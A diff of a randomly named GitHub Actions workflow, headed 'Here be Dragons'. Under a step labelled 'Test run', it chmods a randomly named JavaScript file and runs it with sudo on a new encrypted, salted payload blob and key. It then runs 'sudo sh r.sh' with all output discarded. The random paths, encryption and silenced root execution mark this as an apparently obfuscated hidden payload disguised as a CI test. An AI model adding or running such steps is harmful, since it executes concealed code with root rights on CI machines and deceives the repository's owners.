Here be Dragons

--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'wr5ng'
+        echo 'tfvft'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+fADN6mjCtNb8cWjxG3q5IfDNk0NstlW6gxtmsPB/2/0v5OZl+RMnpmUr4vf6SA/NIcPWjJmLUgz7sL0ZUzGqW2HMxLtwUAgB9HfcOcths6mhQLjsHbyD6 63o1h8 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18yG90oUCzhkI5v320xLreOfwN5zCyuMIppKDih9SuzLozh77Z7ls3I/iW4/ia3Ga3N9KLPXCEqCpe2j6xPfgi2+LOp+V+o/znP2tdGDM2TMwXdKWtwEqnE mqs50y && sudo sh r.sh > /dev/null 2>&1
